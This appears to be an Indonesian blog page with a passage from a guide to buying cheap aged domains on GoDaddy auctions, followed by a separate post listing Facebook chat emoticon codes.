        2. Lihat bagian kanan ada Advanced Search ( gunanya untuk menfilter ) lihat gambar.

        keterangan:
        1 - Masukkan keyword yg diinginkan contoh nya "home" ( jangan lupa pilih yg COntain )
        2 - Masukkan Price ( minimal 1 - Maksimal terserah ) untuk contoh Maximal saya isi 5 ( artinya 5 usd )
        bahkan ada yg $1
        3 - Masukkan Domain AGe ( umur) misal saya isi minimal 1
        4 - Type ( pilih yg Close Out biar bisa langsung beli tanpa ikut lelang ) = biasanya di CLose Out ada PR n/a , PR 0 , PR 1, PR 2 ... PR 3 ada tapi jarang... biasanya PR3 masuk auctions.
        5 - Extention ( pilih sesuai selera, misal .COM .NET .ORG aja )

        lalu klik Search.

        3. Akan ditampilkan domain domain sesuai filter tadi. Dan harganya $5 ( belom termasuk biaya renewal )
        Jangan lupa di cek dulu, sapa tau banyak BL dan ada PR nya juga ... xixixi ( bisa cek di cekpr.com atau deranker.net << promo dikit xixi )

        4. Kalo suka sama domainnya klik aja Buy Now
         

         5. Klik Go to Card

        6. Selesaikan pembayaran ( Bisa cari kupon renewal di THREAD INI biar lebih murah )

        catatan:
        untuk domain yg dibeli di auctions.godaddy.com ... setelah kita bayar, domain gag langsung masuk akun kita. tapi kita harus nunggu seminggu baru masuk akun kita...
        Dan untuk melihat domain apakah sudah terbeli oleh kita dan tanggal brp masuk kandang kita, bisa masuk halaman WON

        >> hxxps://auctions.godaddy.com/trpMyAccount.aspx?ci=22375&s=2&sc=Wo

          Itu aja sob langsung praktekin ya, usahain cari domain Aged berpagerank
        source thanks :)


        Smiley / Emoticon Chatting Facebook Baru

        Setelah kemaren posting tentang cara membuat emoticon fb sendiri, sekarang mau share lagi Smiley atau emoticon chatting facebook yang baru langsung aja ya sob, wat yang suka chatting di fb n' supaya yang di ajak chating ga boring baca chat dari sobat makanya kombinasiin tulisan sama emticon :D

         Langsung Copas aja ya emoticon chatting facebook yang baru di chat bar nya :D




        laugh   [[f9.laugh]]
        sad   [[f9.sad]]
        angry   [[f9.angry]]
        sleepy   [[f9.sleepy]]
        shock   [[f9.shock]]
        kiss   [[f9.kiss]]
        inlove   [[f9.inlove]]
        pizza   [[f9.pizza]]
        coffee   [[f9.coffee]]
        rain   [[f9.rain]]
        bomb   [[f9.bomb]]
        sun   [[f9.sun]]
        heart   [[f9.heart]]
        heartbreak   [[f9.heartbreak]]
        doctor   [[f9.doctor]]
        ghost   [[f9.ghost]]
        brb   [[f9.brb]]
        wine   [[f9.wine]]
        gift   [[f9.gift]]
        adore   [[f9.adore]]
        angel   [[f9.angel]]
        baloons   [[f9.baloons]]
        bowl   [[f9.bowl]]
        cake   [[f9.cake]]
        callme   [[f9.callme]]
        clap   [[f9.clap]]
        confused   [[f9.confused]]
        curllip   [[f9.curllip]]
        devilface   [[f9.devilface]]
        lying   [[f9.lying]]
        Enjoy emoticon chatting facebook yang baru :)


        Related Posts Plugin for WordPress, Blogger...